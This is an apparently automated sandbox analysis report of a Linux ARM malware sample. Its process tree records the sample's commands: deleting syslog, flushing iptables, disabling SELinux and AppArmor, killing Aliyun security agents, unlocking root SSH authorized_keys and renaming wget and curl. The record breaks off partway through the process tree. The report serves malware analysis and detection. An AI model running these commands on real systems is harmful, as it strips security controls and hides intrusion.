1e39f5f7d640646d7b219aedb10f8db7e89279597c59f3a8944fcee1b9827dda

Analysis

max time kernel
40s
max time network
16s
platform
debian-9_armhf
resource
debian9-armhf-20240226-en
resource tags

arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
31-03-2024 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
Size

41KB
MD5

5c75e6f27cc568187e4b7a6371c61181
SHA1

b485da0e29adf4b1c34e9b833f0aba7e7b40655d
SHA256

1e39f5f7d640646d7b219aedb10f8db7e89279597c59f3a8944fcee1b9827dda
SHA512

bbd352c6fc2f2e0dd1db3c81eff5499ed45f1c70bb37a536aac39cebc4b89964c8fd584272c5fb0690bd26cde961a55602b3dabef7adc9cb11d01bbfbad94282
SSDEEP

768:o7+FNcuFVc2zV0xvfK4urZuishkZBxWJY:bF+Ec20/url/xWJY

Score

7^/10

evasion

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid	Process
667	iptables

Attempts to change immutable files 35 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

chattrxargschattrchattrxargsxargssystemctlchattrxargsxargsxargschattrgrepchattrchattrxargschattrchattrchattrchattrgrepxargsxargsxargsxargschattrchattrchattrxargschattrchattrxargsxargssystemctlxargs

pid	Process
1055	chattr
1130	xargs
659	chattr
677	chattr
1071	xargs
1088	xargs
780	systemctl
1053	chattr
1094	xargs
1124	xargs
1106	xargs
676	chattr
715	grep
1059	chattr
1062	chattr
885	xargs
1058	chattr
1061	chattr
1063	chattr
664	chattr
713	grep
806	xargs
811	xargs
1076	xargs
1100	xargs
1054	chattr
1056	chattr
1060	chattr
1118	xargs
1052	chattr
1057	chattr
1082	xargs
1112	xargs
732	systemctl
1136	xargs

Deletes log files 1 TTPs 1 IoCs

Deletes log files on the system.

Indicator Removal

T1070

Processes:

apt-get

description	ioc	Process
File deleted	/var/log/apt/eipp.log.xz	apt-get

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
717	systemctl
753	systemctl
768	systemctl
755	systemctl
717	systemctl
776	systemctl
755	systemctl
717	systemctl
717	systemctl
755	systemctl
780	systemctl
789	systemctl
794	systemctl
762	systemctl
782	systemctl
755	systemctl
717	systemctl
774	systemctl
755	systemctl
755	systemctl
760	systemctl
787	systemctl
792	systemctl
799	systemctl
801	systemctl
717	systemctl
771	systemctl
797	systemctl

Disables SELinux 1 IoCs

Disables SELinux security module.

Processes:

setenforce

pid	Process
716	setenforce

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspssysctlpspspspspspsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Write file to user bin folder 1 TTPs 10 IoCs

Hijack Execution Flow

T1574

Processes:

5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118dpkg

description	ioc	Process
File opened for modification	/usr/bin/kswaped	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/rctlcli	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/systemd-network	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/bin/pamdicks	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/sbin/unhide-linux.dpkg-new	dpkg
File opened for modification	/usr/sbin/unhide-tcp.dpkg-new	dpkg
File opened for modification	/usr/bin/ip6network	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
File opened for modification	/usr/sbin/unhide-posix.dpkg-new	dpkg
File opened for modification	/usr/sbin/unhide_rb.dpkg-new	dpkg
File opened for modification	/usr/bin/irqbalanced	5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118

Enumerates kernel/hardware configuration 1 TTPs 32 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspsunhidepspspspspspspspsps

description	ioc	Process
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/109/task/109/status	ps
File opened for reading	/proc/5933	unhide
File opened for reading	/proc/11156	unhide
File opened for reading	/proc/14805	unhide
File opened for reading	/proc/16572	unhide
File opened for reading	/proc/16802	unhide
File opened for reading	/proc/608/status	ps
File opened for reading	/proc/28995	unhide
File opened for reading	/proc/30265	unhide
File opened for reading	/proc/31544	unhide
File opened for reading	/proc/32013	unhide
File opened for reading	/proc/28204	unhide
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/285/task/285/status	ps
File opened for reading	/proc/8371	unhide
File opened for reading	/proc/8423	unhide
File opened for reading	/proc/20619	unhide
File opened for reading	/proc/20760	unhide
File opened for reading	/proc/21221	unhide
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/26626	unhide
File opened for reading	/proc/28505	unhide
File opened for reading	/proc/30032	unhide
File opened for reading	/proc/25513	unhide
File opened for reading	/proc/272/task	ps
File opened for reading	/proc/12107	unhide
File opened for reading	/proc/21130	unhide
File opened for reading	/proc/21205	unhide
File opened for reading	/proc/21238	unhide
File opened for reading	/proc/21977	unhide
File opened for reading	/proc/22493	unhide
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/28273	unhide
File opened for reading	/proc/43/status	ps
File opened for reading	/proc/14661	unhide
File opened for reading	/proc/20517	unhide
File opened for reading	/proc/20870	unhide
File opened for reading	/proc/27140	unhide
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/794	unhide
File opened for reading	/proc/10557	unhide
File opened for reading	/proc/109/status	ps
File opened for reading	/proc/208/status	ps
File opened for reading	/proc/6538	unhide
File opened for reading	/proc/20191	unhide
File opened for reading	/proc/24396	unhide
File opened for reading	/proc/351/stat	ps
File opened for reading	/proc/220	unhide
File opened for reading	/proc/208/task/217/stat	ps
File opened for reading	/proc/10063	unhide
File opened for reading	/proc/16369	unhide
File opened for reading	/proc/23301	unhide
File opened for reading	/proc/24415	unhide
File opened for reading	/proc/30612	unhide
File opened for reading	/proc/43/stat	ps
File opened for reading	/proc/8889	unhide
File opened for reading	/proc/9165	unhide
File opened for reading	/proc/9589	unhide
File opened for reading	/proc/19408	unhide
File opened for reading	/proc/24901	unhide
File opened for reading	/proc/3350	unhide
File opened for reading	/proc/4702	unhide
File opened for reading	/proc/6873	unhide

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

Processes:

apt-getapt-getapt-extracttemplates

description	ioc	Process
File opened for modification	/tmp/fileutl.message.uqsCBp	apt-get
File opened for modification	/tmp/fileutl.message.0Of10C	apt-get
File opened for modification	/tmp/fileutl.message.I1yxzQ	apt-get
File opened for modification	/tmp/fileutl.message.bPOae9	apt-get
File opened for modification	/tmp/fileutl.message.d7dRT2	apt-get
File opened for modification	/tmp/fileutl.message.LLI1Hf	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.ks80Qm	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.NhzDhZ	apt-get
File opened for modification	/tmp/fileutl.message.kv88de	apt-get
File opened for modification	/tmp/fileutl.message.3hu9Tx	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.OdIMma	apt-get
File opened for modification	/tmp/fileutl.message.a1C8BJ	apt-get
File opened for modification	/tmp/fileutl.message.40ABWv	apt-get
File opened for modification	/tmp/fileutl.message.2voBIH	apt-extracttemplates
File opened for modification	/tmp/fileutl.message.NtZfIe	apt-get
File opened for modification	/tmp/fileutl.message.9tTwKo	apt-get

/tmp/5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
/tmp/5c75e6f27cc568187e4b7a6371c61181_JaffaCakes118
1⤵
- Write file to user bin folder
PID:654
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:655
- /bin/chmod
  chmod 777 /usr/bin/chattr
  2⤵
  PID:656
- /bin/chmod
  chmod 777 /bin/chattr
  2⤵
  PID:658
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:659
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:664
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:667
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Reads CPU attributes
  PID:672
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:676
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:677
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:681
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:685
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:687
- /bin/cat
  cat /var/spool/cron/1
  2⤵
  PID:689
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:691
- /bin/mv
  mv /usr/bin/wgettnt /usr/bin/wd1
  2⤵
  PID:692
- /bin/mv
  mv /usr/bin/curltnt /usr/bin/cd1
  2⤵
  PID:693
- /bin/mv
  mv /usr/bin/wget1 /usr/bin/wd1
  2⤵
  PID:695
- /bin/mv
  mv /usr/bin/curl1 /usr/bin/cd1
  2⤵
  PID:697
- /bin/mv
  mv /usr/bin/cur /usr/bin/cd1
  2⤵
  PID:698
- /bin/mv
  mv /usr/bin/cdl /usr/bin/cd1
  2⤵
  PID:700
- /bin/mv
  mv /usr/bin/cdt /usr/bin/cd1
  2⤵
  PID:702
- /bin/mv
  mv /usr/bin/xget /usr/bin/wd1
  2⤵
  PID:704
- /bin/mv
  mv /usr/bin/wge /usr/bin/wd1
  2⤵
  PID:705
- /bin/mv
  mv /usr/bin/wdl /usr/bin/wd1
  2⤵
  PID:706
- /bin/mv
  mv /usr/bin/wdt /usr/bin/wd1
  2⤵
  PID:708
- /bin/mv
  mv /usr/bin/wget /usr/bin/wd1
  2⤵
  PID:709
- /bin/mv
  mv /usr/bin/curl /usr/bin/cd1
  2⤵
  PID:710
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:712
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:713
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:715
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:714
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:716
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:717
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:718
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:719
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:720
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:724
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:725
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:726
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:729
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Attempts to change immutable files
    - Enumerates kernel/hardware configuration
    PID:732
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:734
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:737
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:739
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:742
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:743
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:747
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:749
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:717
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:717
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:717
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:717
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:717
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:717
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:753
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:755
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:756
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:758
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:760
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:768
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:771
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:774
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:776
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Attempts to change immutable files
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:780
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:782
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:787
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:789
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:792
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:794
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:797
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:799
- /usr/local/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:755
- /usr/local/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:755
- /usr/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:755
- /usr/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:755
- /sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:755
- /bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:755
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:801
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:805
- /bin/grep
  grep aegis
  2⤵
  PID:804
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:806
- /bin/grep
  grep -v grep
  2⤵
  PID:803
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:802
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:811
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:810
- /bin/grep
  grep Yun
  2⤵
  PID:809
- /bin/grep
  grep -v grep
  2⤵
  PID:808
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:807
- /bin/rm
  rm -rf /usr/local/aegis
  2⤵
  PID:812
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:813
- /bin/sleep
  sleep 1
  2⤵
  PID:814
- /usr/bin/apt-get
  apt-get install -y unhide
  2⤵
  - Deletes log files
  - Writes file to tmp directory
  PID:830
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:833
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:838
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:849
- - /usr/lib/apt/methods/http
    /usr/lib/apt/methods/http
    3⤵
    PID:850
- - /bin/sh
    /bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"
    3⤵
    PID:851
  - - /usr/sbin/dpkg-preconfigure
      /usr/sbin/dpkg-preconfigure --apt
      4⤵
      PID:852
    - - /usr/local/sbin/locale
        
        locale charmap
        5⤵
        
        PID:853
    - - /usr/local/bin/locale
        
        locale charmap
        5⤵
        
        PID:853
    - - /usr/sbin/locale
        
        locale charmap
        5⤵
        
        PID:853
    - - /usr/bin/locale
        
        locale charmap
        5⤵
        
        PID:853
- - /usr/bin/dpkg
    /usr/bin/dpkg --assert-multi-arch
    3⤵
    PID:861
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 16 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
    3⤵
    - Write file to user bin folder
    PID:862
  - - /usr/local/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:863
  - - /usr/local/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:863
  - - /usr/sbin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:863
  - - /usr/bin/dpkg-split
      dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:863
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:864
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:864
  - - /usr/sbin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:864
  - - /usr/bin/dpkg-deb
      dpkg-deb --control /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb /var/lib/dpkg/tmp.ci
      4⤵
      PID:864
    - - /usr/local/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:867
    - - /usr/local/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:867
    - - /usr/sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:867
    - - /usr/bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:867
    - - /sbin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:867
    - - /bin/tar
        
        tar -x -f - "--warning=no-timestamp"
        5⤵
        
        PID:867
  - - /usr/local/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:868
  - - /usr/local/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:868
  - - /usr/sbin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:868
  - - /usr/bin/dpkg-deb
      dpkg-deb --fsys-tarfile /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
      4⤵
      PID:868
  - - /usr/local/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:871
  - - /usr/local/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:871
  - - /usr/sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:871
  - - /usr/bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:871
  - - /sbin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:871
  - - /bin/rm
      rm -rf -- /var/lib/dpkg/tmp.ci
      4⤵
      PID:871
- - /usr/bin/dpkg
    /usr/bin/dpkg --status-fd 16 --configure --pending
    3⤵
    PID:872
  - - /var/lib/dpkg/info/unhide.postinst
      /var/lib/dpkg/info/unhide.postinst configure
      4⤵
      PID:873
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:874
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:875
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:876
- /usr/bin/apt-get
  apt-get install -y gawk
  2⤵
  - Writes file to tmp directory
  PID:877
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:878
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    PID:879
- /bin/sleep
  sleep 1
  2⤵
  PID:881
- /usr/bin/awk
  awk "{print \$4}"
  2⤵
  PID:884
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:885
- /bin/grep
  grep PID:
  2⤵
  PID:883
- /usr/sbin/unhide
  /usr/sbin/unhide quick
  2⤵
  - Reads runtime system information
  PID:882
- - /bin/sh
    sh -c "ps --no-header -p 1 o pid"
    3⤵
    PID:886
  - - /bin/ps
      ps --no-header -p 1 o pid
      4⤵
      PID:887
- - /bin/sh
    sh -c "ps --no-header -p 2 o pid"
    3⤵
    PID:888
  - - /bin/ps
      ps --no-header -p 2 o pid
      4⤵
      Reads CPU attributes
      PID:889
- - /bin/sh
    sh -c "ps --no-header -p 3 o pid"
    3⤵
    PID:890
  - - /bin/ps
      ps --no-header -p 3 o pid
      4⤵
      Reads CPU attributes
      PID:891
- - /bin/sh
    sh -c "ps --no-header -p 4 o pid"
    3⤵
    PID:892
  - - /bin/ps
      ps --no-header -p 4 o pid
      4⤵
      Reads CPU attributes
      PID:893
- - /bin/sh
    sh -c "ps --no-header -p 5 o pid"
    3⤵
    PID:894
  - - /bin/ps
      ps --no-header -p 5 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:895
- - /bin/sh
